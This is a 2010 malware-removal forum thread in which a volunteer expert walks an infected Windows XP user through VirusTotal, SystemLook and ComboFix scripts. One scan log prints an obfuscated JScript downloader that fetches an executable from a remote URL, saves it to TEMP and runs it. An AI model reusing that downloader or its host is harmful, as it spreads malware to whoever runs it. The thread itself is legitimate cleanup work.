Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

Help re: Browser Redirects & Raptr Install...

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

Re: Help re: Browser Redirects & Raptr Install...

Unread postby melboy » September 23rd, 2010, 1:01 pm

Hi



Check a file

  • Go to VirusTotal
    c:\windows\system32\termsrv.dll
  • Copy/Paste the file above into the white Upload a file box, or click Browse and navigate to the file.
  • Click Send File, and the file will upload to VirusTotal where it will be scanned by several anti-virus programmes.
    NOTE: if you receive a message stating:
    • File already submitted:, click Reanalyze.
  • After a while, a window will open, with details of what the scans found.
  • Copy and paste the results into your next reply.



Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    Code: Select all
    :file
    c:\program files\.js
    
    :Contents
    c:\program files\.js
    

  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt



COMBOFIX-Script

A word of warning: Please do not run ComboFix on your own. This tool is not for everyday use.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    Code: Select all
    File:: 
    c:\windows\Icuwaf.dat
    c:\windows\Dqovet.bin
    
    Registry::
    [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
    "c:\\Program Files\\UTILS\\Azureus\\Azureus.exe"=-
    
    
    DDS::
    uInternet Settings,ProxyServer = http=127.0.0.1:5555
    Trusted Zone: beatport.com
    
    Firefox::
    FF - ProfilePath - c:\documents and settings\HP_Owner\Application Data\Mozilla\Firefox\Profiles\6ncxoaj9.default\
    FF - HiddenExtension: LoudMo Contextual Ad Assistant: No Registry Reference -
    
    Dirlook::
    c:\documents and settings\HP_Owner\Application Data\Foxix
    c:\documents and settings\HP_Owner\Application Data\Huasq
    c:\documents and settings\HP_Owner\Application Data\Udfyr
    c:\documents and settings\HP_Owner\Application Data\Yfwy
    
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

    Image
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
  • When finished, it shall produce a log for you. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK
Advertisement
Register to Remove

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 23rd, 2010, 4:30 pm

Response from VirusTotal..... (results didn't open in a new windows until I clicked +compact)
----------------------------------------

Antivirus Version Last update Result
AhnLab-V3 2010.09.23.00 2010.09.23 -
AntiVir 7.10.12.23 2010.09.23 -
Antiy-AVL 2.0.3.7 2010.09.23 -
Authentium 5.2.0.5 2010.09.23 -
Avast 4.8.1351.0 2010.09.23 -
Avast5 5.0.594.0 2010.09.23 -
AVG 9.0.0.851 2010.09.23 -
BitDefender 7.2 2010.09.23 Trojan.Generic.3215710
CAT-QuickHeal 11.00 2010.09.23 -
ClamAV 0.96.2.0-git 2010.09.23 -
Comodo 6178 2010.09.23 -
DrWeb 5.0.2.03300 2010.09.23 -
Emsisoft 5.0.0.37 2010.09.23 Virus.Win32.Ursnif.B!IK
eSafe 7.0.17.0 2010.09.21 -
eTrust-Vet 36.1.7872 2010.09.23 -
F-Prot 4.6.2.117 2010.09.23 -
F-Secure 9.0.15370.0 2010.09.23 Trojan.Generic.3215710
Fortinet 4.1.143.0 2010.09.23 W32/Patched.E!tr
GData 21 2010.09.23 Trojan.Generic.3215710
Ikarus T3.1.1.88.0 2010.09.23 Virus.Win32.Ursnif.B
Jiangmin 13.0.900 2010.09.21 -
K7AntiVirus 9.63.2589 2010.09.23 Trojan
Kaspersky 7.0.0.125 2010.09.23 -
McAfee 5.400.0.1158 2010.09.23 Patched Termsrv
McAfee-GW-Edition 2010.1C 2010.09.23 Patched Termsrv
Microsoft 1.6201 2010.09.23 VirTool:Win32/Ursnif.B
NOD32 5474 2010.09.23 Win32/Spy.Ursnif.A
Norman 6.06.06 2010.09.23 -
nProtect 2010-09-23.02 2010.09.23 Trojan.Generic.3215710
Panda 10.0.2.7 2010.09.23 Trj/CI.A
PCTools 7.0.3.5 2010.09.23 -
Prevx 3.0 2010.09.23 -
Rising 22.66.00.07 2010.09.21 -
Sophos 4.58.0 2010.09.23 -
Sunbelt 6918 2010.09.23 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.09.23 -
Symantec 20101.1.1.7 2010.09.23 -
TheHacker 6.7.0.0.029 2010.09.23 -
TrendMicro 9.120.0.1004 2010.09.23 -
TrendMicro-HouseCall 9.120.0.1004 2010.09.23 -
VBA32 3.12.14.1 2010.09.22 -
ViRobot 2010.9.23.4057 2010.09.23 -
VirusBuster 12.65.23.0 2010.09.23 -



______________________________________
Results from SystemLook
______________________________________
SystemLook 04.09.10 by jpshortstuff
Log created at 21:25 on 23/09/2010 by HP_Owner
Administrator - Elevation successful

========== file ==========

c:\program files\.js - File found and opened.
MD5: 051B3E1D962B6D3BF291085C82519779
Created at 22:32 on 12/09/2010
Modified at 22:32 on 12/09/2010
Size: 396 bytes
Attributes: --a----
No version information available.

========== Contents ==========

c:\program files\.js - Opened succesfully.

new Function(ad(';)0,f(nuR.s;)2,f(eliFoTevaS.o;)ydoBesnopser.x(etirW.o;)(nepO.o;1=epyT.o;3=edoM.o;)(dnes.x;)0,"php.ssorcgnilradsrehtom/y/cc.ssnalceht//:ptth","TEG"(nepo.x;"exe.0/"+)"PMET"(metI.)"ssecorP"(tnemnorivnE.s=f;)"PTTHLMX.tfosorciM"(a wen=x;)"maertS.BDODA"(a wen=o;)"llehS.tpircSW"(a wen=s;tcejbOXevitcA = a'))();function ad(bd){r='';for(i=bd.length;i;i--)r+=bd.substr(i,1,1);return r}


-= EOF =-

Running ComboFix Script now....
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 23rd, 2010, 5:14 pm

ComboFix Log have run script provided.....
________________________________________

ComboFix 10-09-22.02 - HP_Owner 23/09/2010 21:37:07.2.2 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.3071.2530 [GMT 1:00]
Running from: c:\documents and settings\HP_Owner\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\HP_Owner\Desktop\CFScript.txt
AV: McAfee Anti-Virus and Anti-Spyware *On-access scanning disabled* (Updated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Firewall *disabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}

FILE ::
"c:\windows\Dqovet.bin"
"c:\windows\Icuwaf.dat"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\Dqovet.bin
c:\windows\Icuwaf.dat

.
((((((((((((((((((((((((( Files Created from 2010-08-23 to 2010-09-23 )))))))))))))))))))))))))))))))
.

2010-09-23 01:38 . 2010-09-23 02:14 -------- d-----w- c:\program files\eMusic Download Manager
2010-09-22 23:09 . 2010-06-14 14:31 744448 -c----w- c:\windows\system32\dllcache\helpsvc.exe
2010-09-22 01:26 . 2010-09-23 20:31 -------- d-----w- C:\_malware logs
2010-09-21 18:04 . 2010-09-21 18:04 -------- d-----w- C:\rsit
2010-09-20 22:43 . 2010-09-21 01:35 -------- d-----w- c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2010-09-20 22:43 . 2010-09-20 22:49 -------- d-----w- c:\program files\Spybot - Search & Destroy
2010-09-20 21:51 . 2010-09-22 22:12 -------- d-----w- c:\windows\system32\MpEngineStore
2010-09-20 16:23 . 2010-09-21 18:06 -------- d-----w- c:\program files\Trend Micro
2010-09-14 01:33 . 2010-09-14 07:47 -------- d-----w- C:\ccleaner
2010-09-13 22:26 . 2010-09-13 22:26 -------- d-----w- c:\documents and settings\Administrator\Application Data\Malwarebytes
2010-09-13 18:24 . 2010-09-13 18:24 -------- d-----w- c:\windows\Options
2010-09-13 01:44 . 2010-09-13 01:44 10134 ----a-r- c:\documents and settings\HP_Owner\Application Data\Microsoft\Installer\{4CCC7F68-A437-4559-A840-F5E010934951}\ARPPRODUCTICON.exe
2010-09-12 20:39 . 2010-09-12 20:39 310208 ----a-w- c:\documents and settings\HP_Owner\Application Data\Azureus\plugins\mlab\ShaperProbeC.exe
2010-09-12 20:35 . 2010-09-12 20:35 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Motive
2010-08-27 21:21 . 2006-08-24 05:44 477696 ----a-r- c:\windows\system32\drivers\ZD1211BU.sys

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-09-23 20:32 . 2010-05-02 14:57 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\TeraCopy
2010-09-23 02:14 . 2008-11-28 18:35 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\eMusic
2010-09-22 22:13 . 2006-01-20 08:30 5504 ----a-w- c:\windows\system32\drivers\intelide.sys
2010-09-22 20:09 . 2007-09-29 20:11 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Azureus
2010-09-19 20:13 . 2009-07-23 18:08 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\vlc
2010-09-14 10:58 . 2010-08-10 09:25 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Foxix
2010-09-14 10:58 . 2006-08-23 15:39 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Huasq
2010-09-13 18:24 . 2008-09-18 20:59 -------- d-----w- c:\program files\iTunes
2010-09-13 18:16 . 2006-11-18 09:52 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Udfyr
2010-09-13 15:15 . 2006-01-20 04:18 -------- d-----w- c:\program files\UTILS
2010-09-13 15:07 . 2008-10-13 13:22 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Yfwy
2010-09-12 22:32 . 2010-09-12 22:32 396 ----a-w- c:\program files\.js
2010-08-24 13:57 . 2010-04-15 21:10 9344 ----a-w- c:\windows\system32\drivers\mfeclnk.sys
2010-08-24 13:57 . 2010-04-15 21:09 95600 ----a-w- c:\windows\system32\drivers\mfeapfk.sys
2010-08-24 13:57 . 2010-04-15 21:09 88544 ----a-w- c:\windows\system32\drivers\mfendisk.sys
2010-08-24 13:57 . 2010-04-15 21:09 84264 ----a-w- c:\windows\system32\drivers\mferkdet.sys
2010-08-24 13:57 . 2010-04-15 21:09 84072 ----a-w- c:\windows\system32\drivers\mfetdi2k.sys
2010-08-24 13:57 . 2010-04-15 21:09 52104 ----a-w- c:\windows\system32\drivers\mfebopk.sys
2010-08-24 13:57 . 2010-04-15 21:09 386712 ----a-w- c:\windows\system32\drivers\mfehidk.sys
2010-08-24 13:57 . 2010-04-15 21:09 312904 ----a-w- c:\windows\system32\drivers\mfefirek.sys
2010-08-24 13:57 . 2010-04-15 21:09 152992 ----a-w- c:\windows\system32\drivers\mfeavfk.sys
2010-08-24 13:57 . 2010-04-15 21:09 55840 ----a-w- c:\windows\system32\drivers\cfwids.sys
2010-08-17 13:17 . 2006-01-20 08:32 58880 ----a-w- c:\windows\system32\spoolsv.exe
2010-07-22 15:49 . 2006-01-20 08:32 590848 ----a-w- c:\windows\system32\rpcrt4.dll
2010-07-22 05:57 . 2009-04-15 19:31 5120 ----a-w- c:\windows\system32\xpsp4res.dll
2010-06-30 12:31 . 2006-01-20 08:32 149504 ----a-w- c:\windows\system32\schannel.dll
2010-08-24 13:57 . 2010-04-15 21:10 24376 ----a-w- c:\program files\mozilla firefox\components\Scriptff.dll
2005-01-03 22:30 . 2006-01-20 08:54 0 --sha-w- c:\windows\SMINST\HPCD.SYS
.

(((((((((((((((((((((((((((((((((((((((((((( Look )))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
---- Directory of c:\documents and settings\HP_Owner\Application Data\Foxix ----


---- Directory of c:\documents and settings\HP_Owner\Application Data\Huasq ----


---- Directory of c:\documents and settings\HP_Owner\Application Data\Udfyr ----


---- Directory of c:\documents and settings\HP_Owner\Application Data\Yfwy ----

2010-09-13 15:00 . 2010-09-13 15:00 661159 ----a-w- c:\documents and settings\HP_Owner\Application Data\Yfwy\dehye.tmp


------- Sigcheck -------

[7] 2008-04-14 . FF3477C03BE7201C294C35F684B3479F . 295424 . . [5.1.2600.5512] . . c:\windows\ServicePackFiles\i386\termsrv.dll
[-] 2008-04-14 . 3B58675ED2C6A68C38624681C2548862 . 295424 . . [5.1.2600.5512] . . c:\windows\system32\termsrv.dll
[7] 2008-04-14 . FF3477C03BE7201C294C35F684B3479F . 295424 . . [5.1.2600.5512] . . c:\windows\system32\dllcache\termsrv.dll
[7] 2004-08-03 . B60C877D16D9C880B952FDA04ADF16E6 . 295424 . . [5.1.2600.2180] . . c:\windows\$NtServicePackUninstall$\termsrv.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{9DFE2FE9-CF99-4ADF-A28E-9B5ADB8DC74F}]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-07-13 68856]
"SpybotSD TeaTimer"="c:\program files\Spybot - Search & Destroy\TeaTimer.exe" [2009-03-05 2260480]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"hpsysdrv"="c:\windows\system\hpsysdrv.exe" [1998-05-07 52736]
"HPHUPD06"="c:\program files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe" [2004-06-07 49152]
"HPHmon06"="c:\windows\system32\hphmon06.exe" [2004-06-07 659456]
"KBD"="c:\hp\KBD\KBD.EXE" [2003-02-11 61440]
"Recguard"="c:\windows\SMINST\RECGUARD.EXE" [2004-04-14 233472]
"SiS Windows KeyHook"="c:\windows\system32\keyhook.exe" [2004-05-20 249856]
"ATIPTA"="c:\program files\ATI Technologies\ATI Control Panel\atiptaxx.exe" [2004-06-24 339968]
"ATICCC"="c:\program files\ATI Technologies\ATI.ACE\cli.exe" [2005-08-12 45056]
"SoundMan"="SOUNDMAN.EXE" [2004-07-01 73728]
"AlcWzrd"="ALCWZRD.EXE" [2004-07-06 2550272]
"PS2"="c:\windows\system32\ps2.exe" [2002-10-16 81920]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2007-08-31 1037736]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-10-28 141600]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-06-09 976832]
"mcui_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2010-06-30 1193848]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-06-20 35760]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 88363]
"Malwarebytes' Anti-Malware"="c:\program files\Malwarebytes' Anti-Malware\mbamgui.exe" [2010-04-29 437584]

c:\documents and settings\HP_Owner\Start Menu\Programs\Startup\
Adobe Gamma.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2005-3-16 113664]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Acrobat Assistant.lnk - c:\program files\Adobe\Acrobat 6.0\Distillr\acrotray.exe [2003-5-15 217193]
HP Digital Imaging Monitor.lnk - c:\program files\HP\Digital Imaging\bin\hpqtra08.exe [2005-5-12 282624]
HP Image Zone Fast Start.lnk - c:\program files\HP\Digital Imaging\bin\hpqthb08.exe [2005-5-12 73728]
Microsoft Office.lnk - c:\program files\Microsoft Office\Office10\OSA.EXE [2001-2-13 83360]
Windows Home Server.lnk - c:\windows\Installer\{21E49794-7C13-4E84-8659-55BD378267D5}\WHSTrayApp.exe [2010-2-20 604008]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"RequireSignedAppInit_DLLs"=1 (0x1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CloneCDTray]
2006-09-28 19:21 57344 ----a-w- c:\program files\SlySoft\CloneCD\CloneCDTray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Home Theater SchSvr]
2004-07-30 10:34 155648 ----a-w- c:\program files\Common Files\InterVideo\SchSvr\SchSvr.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\mxomssmenu]
2007-09-06 14:53 169264 ----a-w- c:\program files\Maxtor\OneTouch Status\MaxMenuMgr.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2009-09-05 00:54 417792 ----a-w- c:\program files\QuickTime\QTTask.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2009-11-02 22:52 198160 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Windows Media Connect 2]
2006-10-18 20:58 8704 ------w- c:\program files\Windows Media Connect 2\WMCCFG.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WINREMOTE]
2004-07-30 10:41 192512 ----a-w- c:\program files\InterVideo\Common\Bin\WinRemote.exe

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"c:\\Program Files\\Messenger\\msmsgs.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\SmartFTP Client 2.0\\SmartFTP.exe"=
"c:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
"c:\\Program Files\\TVersity\\Media Server\\MediaServer.exe"=
"c:\\Program Files\\Common Files\\McAfee\\McSvcHost\\McSvHost.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"3587:TCP"= 3587:TCP:Windows Peer-to-Peer Grouping
"3540:UDP"= 3540:UDP:Peer Name Resolution Protocol (PNRP)
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\IcmpSettings]
"AllowInboundEchoRequest"= 1 (0x1)

R1 mfetdi2k;McAfee Inc. mfetdi2k;c:\windows\system32\drivers\mfetdi2k.sys [15/04/2010 22:09 84072]
R2 HPMSSConnectorSvc;HPMSSConnectorService;c:\program files\Hewlett-Packard\HP MediaSmart Server\MSSConnectorService.exe [05/10/2009 12:09 20992]
R2 Iprip;RIP Listener;c:\windows\System32\svchost.exe -k netsvcs [20/01/2006 09:32 14336]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [04/05/2010 01:17 304464]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [13/01/2010 23:35 88176]
R2 McMPFSvc;McAfee Personal Firewall Service;"c:\program files\Common Files\Mcafee\McSvcHost\McSvHost.exe" /McCoreSvc [15/04/2010 22:09 271480]
R2 McNaiAnn;McAfee VirusScan Announcer;"c:\program files\Common Files\McAfee\McSvcHost\McSvHost.exe" /McCoreSvc [15/04/2010 22:09 271480]
R2 MediaCollectorService;MediaCollectorService;c:\program files\Hewlett-Packard\HP MediaSmart Server\MediaCollectorClient.exe [05/10/2009 12:09 81920]
R2 mfefire;McAfee Firewall Core Service;c:\program files\Common Files\McAfee\SystemCore\mfefire.exe [15/04/2010 22:10 188136]
R2 mfevtp;McAfee Validation Trust Protection Service;c:\program files\Common Files\McAfee\SystemCore\mfevtps.exe [15/04/2010 22:09 141792]
R2 WHSConnector;Windows Home Server Connector Service;c:\program files\Windows Home Server\WHSConnector.exe [07/10/2009 14:48 376680]
R3 cfwids;McAfee Inc. cfwids;c:\windows\system32\drivers\cfwids.sys [15/04/2010 22:09 55840]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [04/05/2010 01:17 20952]
R3 mfefirek;McAfee Inc. mfefirek;c:\windows\system32\drivers\mfefirek.sys [15/04/2010 22:09 312904]
R3 mfendiskmp;mfendiskmp;c:\windows\system32\drivers\mfendisk.sys [15/04/2010 22:09 88544]
R3 PhTVTune;ASUS WDM TV Tuner;c:\windows\system32\drivers\PhTVTune.sys [02/01/2004 03:19 24608]
S2 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [29/01/2010 03:46 135664]
S3 mfendisk;McAfee Core NDIS Intermediate Filter;c:\windows\system32\drivers\mfendisk.sys [15/04/2010 22:09 88544]
S3 mferkdet;McAfee Inc. mferkdet;c:\windows\system32\drivers\mferkdet.sys [15/04/2010 22:09 84264]
S3 xbreader;MaxDrive XBox Driver (xbreader.sys);c:\windows\system32\drivers\xbreader.sys [03/01/2001 00:53 19677]

--- Other Services/Drivers In Memory ---

*Deregistered* - mfeavfk01

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
p2psvc REG_MULTI_SZ p2psvc p2pimsvc p2pgasvc PNRPSvc
getPlusHelper REG_MULTI_SZ getPlusHelper
.
Contents of the 'Scheduled Tasks' folder

2010-09-23 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]

2010-09-23 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-29 02:46]

2010-09-23 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-29 02:46]

2008-09-16 c:\windows\Tasks\Microsoft_Hardware_Launch_IPoint_exe.job
- c:\program files\Microsoft IntelliPoint\ipoint.exe [2007-08-31 19:01]

2010-09-23 c:\windows\Tasks\User_Feed_Synchronization-{BEDA1DC8-9CAF-4902-8B5F-2FB3702C6673}.job
- c:\windows\system32\msfeedssync.exe [2006-10-17 11:58]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.facebook.com/
uDefault_Search_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE= ... pf=desktop
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Settings,ProxyOverride = <local>
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: &Download with &DAP - c:\program files\UTILS\DAP\dapextie.htm
IE: Download &all with DAP - c:\program files\UTILS\DAP\dapextie2.htm
IE: Download All by FlashGet - c:\progra~1\UTILS\FlashGet\jc_all.htm
IE: Download using FlashGet - c:\progra~1\UTILS\FlashGet\jc_link.htm
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office10\EXCEL.EXE/3000
IE: Google Sidewiki... - c:\program files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_89D8574934B26AC4.dll/cmsidewiki.html
Name-Space Handler: ftp\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\UTILS\DAP\dapie.dll
Name-Space Handler: http\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\UTILS\DAP\dapie.dll
FF - ProfilePath - c:\documents and settings\HP_Owner\Application Data\Mozilla\Firefox\Profiles\6ncxoaj9.default\
FF - prefs.js: browser.search.defaulturl - hxxp://flvdirect.iamwired.net/websearch ... ps&search=
FF - prefs.js: browser.search.selectedEngine - Google
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-09-23 21:51
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-372253836-758569873-2018747408-1007\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1604)
c:\windows\system32\Ati2evxx.dll
.
Completion time: 2010-09-23 21:56:57
ComboFix-quarantined-files.txt 2010-09-23 20:56

Pre-Run: 134,338,965,504 bytes free
Post-Run: 134,378,242,048 bytes free

- - End Of File - - 1C508C4AB5F523F2A4368D855EAE3CC7
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby melboy » September 23rd, 2010, 5:26 pm

Hi

Good - Another CFScript:


COMBOFIX-Script
A word of warning: Please do not run ComboFix on your own. This tool is not a toy and not for everyday use.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    Code: Select all
    FCopy::
    c:\windows\ServicePackFiles\i386\termsrv.dll | c:\windows\system32\termsrv.dll
    
    Folder::
    c:\documents and settings\HP_Owner\Application Data\Foxix
    c:\documents and settings\HP_Owner\Application Data\Huasq
    c:\documents and settings\HP_Owner\Application Data\Udfyr
    c:\documents and settings\HP_Owner\Application Data\Yfwy
    
    Firefox::
    FF - ProfilePath - c:\documents and settings\HP_Owner\Application Data\Mozilla\Firefox\Profiles\6ncxoaj9.default\
    FF - prefs.js: browser.search.defaulturl - 
    
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

    Image
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
  • When finished, it shall produce a log for you. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 23rd, 2010, 6:08 pm

ComboFix Results....
_________________________________________

